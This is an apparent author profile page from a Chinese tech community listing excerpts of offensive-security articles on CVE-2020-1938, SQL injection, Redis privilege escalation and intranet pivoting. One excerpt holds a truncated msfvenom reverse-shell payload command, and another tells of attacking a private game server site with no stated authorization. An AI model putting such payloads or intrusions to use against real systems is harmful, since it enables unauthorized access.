用户6343818

LV0
发表了文章

记录一次求职面试经历

其实做我们这个行业,求职面试的时候会想,技术面试会问我们什么技术问题?答不上来怎么办?然后会纷纷求助自己的朋友,请教他当时是怎么面试的。问的什么技术问题...

用户6343818
发表了文章

【二进制安全】熊猫烧香病毒分析

熊猫烧香这个病毒虽然过去很久了,但是这个病毒值得研究,在病毒出现的这个年代因为安全意识普遍不强,导致大范围被感染。本文带你跨进计算机病毒的大门

用户6343818
发表了文章

应急响应篇_windows端口与进程排查

netstat -ano | findstr “ESTABLISHED” 获取正在链接的IP地址和进程信息

用户6343818
发表了文章

[实战]单刀直入某私服站

风和日丽的一个下午,好基友突然发了一个私服的网站,说搞不下来,我打开网页看了一下,网页十分简单,功能点不多,仅仅只有一个登录框,而且还没办法注册,不好看,随手测...

用户6343818
发表了文章

【漏洞复现】CVE-2020-1938(ghostcat)

Tomcat Connector 是 Tomcat 与外部连接的通道,它使得 Catalina 能够接收来自外部的请求,传递给对应的 Web 应用程序处...

用户6343818
发表了文章

【 二进制安全】House Of Eingherjar

我们可以看到 free 指针 p 的时候,prevsize 实际上是 p 堆块的 prevsize 位,这其实就是利用了 malloc 中的隐式链表技术...

用户6343818
发表了文章

【原创】基础篇--文件包含漏洞总结

服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到攻击的目的。

用户6343818
发表了文章

【实战分享】从sql注入到内网漫游

对于红队队员来说,打点之后最重要的就是横向的内网渗透了,但很多人都卡在了这一步,今天这篇文章就主要讲一讲cobaltstrike和msf的联动,内网渗透的一些小...

用户6343818
发表了文章

【工具使用】CVE-2020-1938批量扫描工具

昨天刚发的复现文章,今天在github上一看就有批量工具了,索性今天写下工具的使用笔记。(工具并非本人所写,如有任何问题请联系作者,结尾有链接)

用户6343818
发表了文章

[实战]记录一次实战内容(比较扎心)

https://xxx..xxx.xxx.com/#/login,#后面带着login这里让我突然联想到,有种熟悉的感觉,对,就是熟悉的感觉,哪...

用户6343818
发表了文章

kali 绕过uac提权

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=1...

用户6343818
发表了文章

内网基础篇——浅谈内网

内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。

用户6343818
发表了文章

授权项目之api接口泄露Getshell

可以看到只有一个登入框,这里不不多说其他多余的话,还是要对该目标站点进行信息收集,如:端口扫描(Nmap),敏感目录扫描(dirsearch、7kb),云悉(探...

用户6343818
发表了文章

记录一次渗透测试实战

登录框测试,因为是mssql数据库+aspx开发的,我习惯性的先测试下注入,结果这个注入也存在的哦。 抓包使用sqlmap跑(这里忘记说了,这个站自身是有waf...

用户6343818
发表了文章

零度安全攻防实验室助力SenIN

用户6343818
发表了文章

Redis未授权访问常见提权方式

Redis在默认情况会将服务绑定在6379端口上,从而将服务暴露在公网环境下,如果在没有开启安全认证的情况下,可以导致任意用户未授权访问Redis服务器并Red...

用户6343818
发表了文章

Microsoft SQL Server手注之报错注入

今天主要分享下sql注入中的报错型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。

用户6343818

个人简介

个人成就

扫码关注云+社区

领取腾讯云代金券